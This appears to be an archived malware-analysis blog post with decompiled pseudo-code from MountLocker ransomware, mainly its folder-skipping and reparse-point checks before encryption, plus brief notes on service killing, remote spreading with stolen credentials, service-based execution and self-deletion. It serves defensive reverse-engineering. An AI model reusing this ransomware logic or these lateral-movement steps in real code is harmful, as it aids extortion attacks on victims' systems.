[QuickNote] MountLocker – Some pseudo-code snippets
Published: 2021-08-04 · Archived: 2026-04-05 22:57:07 UTC
+ Kill services, if service name contains any string is "SQL", "database", "msexchange" :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
__int64 __fastcall f_ml_check_folder_in_ignored_list_and_log_info( __int64
*stru_offset, ml_target_info *target_info)
{
REPARSE_DATA_BUFFER *reparse_point_data;
const WCHAR *ptr_ignored_folder_list;
const WCHAR *target_name;
__int64 i;
const wchar_t *black_list_info;
HANDLE hFile;
__int64 win32_err_code;
const wchar_t *err_log_str;
BOOL ret;
__int64 v14;
char *v15;
DWORD BytesReturned;
reparse_point_data = (REPARSE_DATA_BUFFER *)&target_info->target_ransom_note_name;
_InterlockedAdd(&dword_140013350, 1u);
ptr_ignored_folder_list = g_ignored_folder_list;
target_name = CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)-
>target_name;
i = 0i64;
while ( ptr_ignored_folder_list )
https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/
Page 1 of 5

22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
{
if ( StrStrIW(target_name, ptr_ignored_folder_list) )
{
black_list_info = L"[SKIP] locker.dir.check > black_list name=%s\r\n" ;
LABEL_10:
_InterlockedAdd(&dword_140013354, 1u);
log_info:
f_ml_write_format_string_to_log_file_or_console(1, black_list_info, target_name);
return 0i64;
}
ptr_ignored_folder_list = (&g_ignored_folder_list)[++i];
}
if ( g_target || g_fullpd_flag )
{
target_info->encrypt_target_of_full_flag = 0;
}
else if ( f_ml_check_folder_name_is_ProgramData_ProgramFiles_SQL(stru_offset,
target_info) )
{
black_list_info = L"[SKIP] locker.dir.check > no sql program dir name=%s\r\n" ;
goto LABEL_10;
}
if ( !(CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)-
>lpFindData.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT) )
{
f_ml_write_format_string_to_log_file_or_console(1, L"[OK] locker.dir.check >
name=%s\r\n" , target_name);
https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/
Page 2 of 5

48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
return 1i64;
}
hFile = CreateFileW(target_name, 0x80u, 7u, 0i64, OPEN_EXISTING, 0x2200400u, 0i64);
if ( hFile == ( HANDLE )INVALID_HANDLE_VALUE )
{
win32_err_code = GetLastError();
err_log_str = L"[WARN] locker.dir.check > open error=%u name=%s\r\n" ;
log_error:
f_ml_write_format_string_to_log_file_or_console(1, err_log_str, win32_err_code,
target_name);
return 1i64;
}
ret = DeviceIoControl(hFile, FSCTL_GET_REPARSE_POINT, 0i64, 0, reparse_point_data,
0x4000u, &BytesReturned, 0i64);
CloseHandle(hFile);
if ( !ret )
{
win32_err_code = GetLastError();
err_log_str = L"[WARN] locker.dir.check > get_reparse_point error=%u
name=%s\r\n" ;
goto log_error;
}
if ( reparse_point_data->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT )
{
v14 = 0x10i64;
}
else
https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/
Page 3 of 5

74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
{
if ( reparse_point_data->ReparseTag != IO_REPARSE_TAG_SYMLINK )
{
win32_err_code = reparse_point_data->ReparseTag;
err_log_str = L"[WARN] locker.dir.check > unknown_tag tag=%0.8X name=%s\r\n" ;
goto log_error;
}
v14 = 0x14i64;
}
v15 = ( char *)reparse_point_data + v14;
if ( *target_name == '\\'
&& CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)->target_name[1] ==
'\\'
&& CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)->target_name[2] !=
'?' )
{
black_list_info = L"[SKIP] locker.dir.check > reparse_point_into_share
name=%s\r\n" ;
goto log_info;
}
if ( StrStrIW(( PCWSTR )(( char *)reparse_point_data + v14), L":\\" ) )
{
_InterlockedAdd(&dword_140013354, 1u);
f_ml_write_format_string_to_log_file_or_console(1, L"[SKIP] locker.dir.check >
target_visibled target=%s name=%s\r\n" , v15, target_name);
return 0i64;
}
https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/
Page 4 of 5

100
f_ml_write_format_string_to_log_file_or_console(1, L"[OK] locker.dir.check >
target_hidden target=%s name=%s\r\n" , v15, target_name);
return 1i64;
}
…. and skipped folder name is:
+ Use WNetAddConnection2W to make a connection to remote target PC by using the provided username and
password arg:
+ Execute payload through a service.
After completing the encryption process on the victim machine, it updates log statistics:
Malware checks the /NODEL argument. If this value is 0 , it will delete itself.
Source: https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/
https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/
Page 5 of 5